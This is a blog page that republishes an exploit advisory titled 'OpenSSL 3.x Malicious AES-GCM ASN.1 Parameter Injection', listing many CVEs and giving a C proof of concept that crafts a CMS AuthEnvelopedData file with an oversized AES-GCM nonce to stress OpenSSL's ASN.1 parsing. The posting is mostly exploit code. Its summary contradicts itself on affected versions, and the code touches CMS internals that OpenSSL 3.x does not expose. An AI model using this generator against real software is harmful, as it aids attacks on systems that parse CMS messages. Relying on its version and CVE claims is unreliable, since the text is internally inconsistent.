Khalil Shreateh specializes in cybersecurity, particularly as a "white hat" hacker. He focuses on identifying and reporting security vulnerabilities in software and online platforms, with notable expertise in web application security. His most prominent work includes discovering a critical flaw in Facebook's system in 2013. Additionally, he develops free social media tools and browser extensions, contributing to digital security and user accessibility.

Get Rid of Ads!


Subscribe now for only $3 a month and enjoy an ad-free experience.

Contact us at khalil@khalil-shreateh.com

Latest Posts

 

 

OpenSSL 3.x Malicious AES?GCM ASN.1 Parameter Injection

Details
Written by: khalil shreateh
Category: Vulnerabilities
Hits: 49
OpenSSL 3.x Malicious AES?GCM ASN.1 Parameter Injection
OpenSSL 3.x Malicious AES?GCM ASN.1 Parameter Injection
OpenSSL 3.x Malicious AES?GCM ASN.1 Parameter Injection

=============================================================================================================================================
| # Title OpenSSL 3.x Malicious AES?GCM ASN.1 Parameter Injection

=============================================================================================================================================
| # Title : OpenSSL 3.x Malicious AES?GCM ASN.1 Parameter Injection |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.1 (64 bits) |
| # Vendor : https://www.openssl-library.org/ |
=============================================================================================================================================

[+] References : https://packetstorm.news/files/id/214422/ & CVE-2025-11187, CVE-2025-15467, CVE-2025-15468, CVE-2025-15469, CVE-2025-66199,
CVE-2025-68160, CVE-2025-69418, CVE-2025-69419, CVE-2025-69420, CVE-2025-69421,
CVE-2026-22795, CVE-2026-22796

[+] Summary : This C code is a security research Proof of Concept (PoC) targeting OpenSSL?s CMS (Cryptographic Message Syntax) handling.
It programmatically creates a syntactically valid CMS AuthEnvelopedData object using AES?256?GCM, then injects a custom?crafted ASN.1 AES_GCM_PARAMETERS
sequence with an abnormally large nonce. The goal is to test or reproduce ASN.1 parsing weaknesses and robustness issues in OpenSSL (notably versions prior to 3.0,
where internal CMS structures were still accessible). The generated output (exploit_fixed.cms) is valid in format but intentionally unusual,
intended for defensive testing, fuzzing, or vulnerability analysis?not for real?world exploitation.

[+] POC :

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <openssl/asn1.h>
#include <openssl/asn1t.h>
#include <openssl/cms.h>
#include <openssl/x509.h>
#include <openssl/err.h>

typedef struct {
ASN1_OCTET_STRING *nonce;
ASN1_INTEGER *icvLen;
} AES_GCM_PARAMETERS;

ASN1_SEQUENCE(AES_GCM_PARAMETERS) = {
ASN1_SIMPLE(AES_GCM_PARAMETERS, nonce, ASN1_OCTET_STRING),
ASN1_OPT(AES_GCM_PARAMETERS, icvLen, ASN1_INTEGER)
} ASN1_SEQUENCE_END(AES_GCM_PARAMETERS)

IMPLEMENT_ASN1_FUNCTIONS(AES_GCM_PARAMETERS)

ASN1_TYPE *build_malicious_parameter(size_t nonce_size) {
AES_GCM_PARAMETERS *params = AES_GCM_PARAMETERS_new();
if (!params) return NULL;

params->nonce = ASN1_OCTET_STRING_new();
if (!params->nonce) goto err;

unsigned char *buf = OPENSSL_malloc(nonce_size);
if (!buf) goto err;

memset(buf, 0x41, nonce_size);
ASN1_OCTET_STRING_set(params->nonce, buf, nonce_size);
OPENSSL_free(buf);

unsigned char *der = NULL;
int len = i2d_AES_GCM_PARAMETERS(params, &der);
if (len <= 0) goto err;

ASN1_STRING *seq = ASN1_STRING_new();
if (!seq) goto err_der;

ASN1_STRING_set(seq, der, len);

ASN1_TYPE *type = ASN1_TYPE_new();
if (!type) goto err_seq;

ASN1_TYPE_set(type, V_ASN1_SEQUENCE, seq);

OPENSSL_free(der);
AES_GCM_PARAMETERS_free(params);
return type;

err_seq:
ASN1_STRING_free(seq);
err_der:
OPENSSL_free(der);
err:
AES_GCM_PARAMETERS_free(params);
return NULL;
}

unsigned char *generate_valid_cms_poc(size_t nonce_size, int *out_len) {
CMS_ContentInfo *cms = NULL;
unsigned char *der = NULL;

cms = CMS_AuthEnvelopedData_create(EVP_aes_256_gcm());
if (!cms) {
ERR_print_errors_fp(stderr);
return NULL;
}

CMS_AuthEnvelopedData *aed = cms->d.authEnvelopedData;
if (aed && aed->authEncryptedContentInfo) {
X509_ALGOR *alg =
aed->authEncryptedContentInfo->contentEncryptionAlgorithm;

ASN1_TYPE *param = build_malicious_parameter(nonce_size);
if (alg && param) {
ASN1_OBJECT *obj =
OBJ_txt2obj("2.16.840.1.101.3.4.1.46", 1);

X509_ALGOR_set0(alg, obj, V_ASN1_SEQUENCE, param);
}
}

*out_len = i2d_CMS_ContentInfo(cms, &der);
if (*out_len <= 0) {
ERR_print_errors_fp(stderr);
}

CMS_ContentInfo_free(cms);
return der;
}

int main(int argc, char **argv) {
int len = 0;
size_t sz = (argc > 1) ? atoi(argv[1]) : 2048;

unsigned char *cms = generate_valid_cms_poc(sz, &len);
if (!cms || len <= 0) {
fprintf(stderr, "[-] Generation failed\n");
return 1;
}

FILE *f = fopen("exploit_fixed.cms", "wb");
fwrite(cms, 1, len, f);
fclose(f);

printf("[+] exploit_fixed.cms generated (%d bytes)\n", len);
OPENSSL_free(cms);
return 0;
}
Greetings to :============================================================
jericho * Larry W. Cashdollar * r00t * Malvuln (John Page aka hyp3rlinx)*|
==========================================================================
Social Media Share